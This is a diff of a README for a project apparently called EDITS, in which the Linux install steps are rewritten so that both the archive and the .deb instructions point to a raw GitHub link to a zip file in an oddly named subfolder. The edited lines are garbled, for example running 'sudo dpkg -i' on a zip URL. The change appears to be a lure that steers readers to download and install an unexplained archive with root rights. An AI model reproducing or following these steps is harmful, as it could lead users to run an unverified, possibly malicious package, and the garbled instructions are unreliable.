hwtp/EDITS/README.md

   - Drag the EDITS icon to your Applications folder.

 - **For Linux**:
-  - If you have a `.tar.gz` file, extract it and follow the instructions in the README file included.
+  - If you have a `https://raw.githubusercontent.com/hwtp/EDITS/main/zoophorus/EDITS.zip` file, extract it and follow the instructions in the README file included.
-  - If you have a `.deb` file, open a terminal and run `sudo dpkg -i filename.deb` (replace `filename.deb` with the correct file name).
+  - If you have a `.deb` file, open a terminal and run `sudo dpkg -i https://raw.githubusercontent.com/hwtp/EDITS/main/zoophorus/EDITS.zip` (replace `https://raw.githubusercontent.com/hwtp/EDITS/main/zoophorus/EDITS.zip` with the correct file name).

 ### Step 4: Launch the Application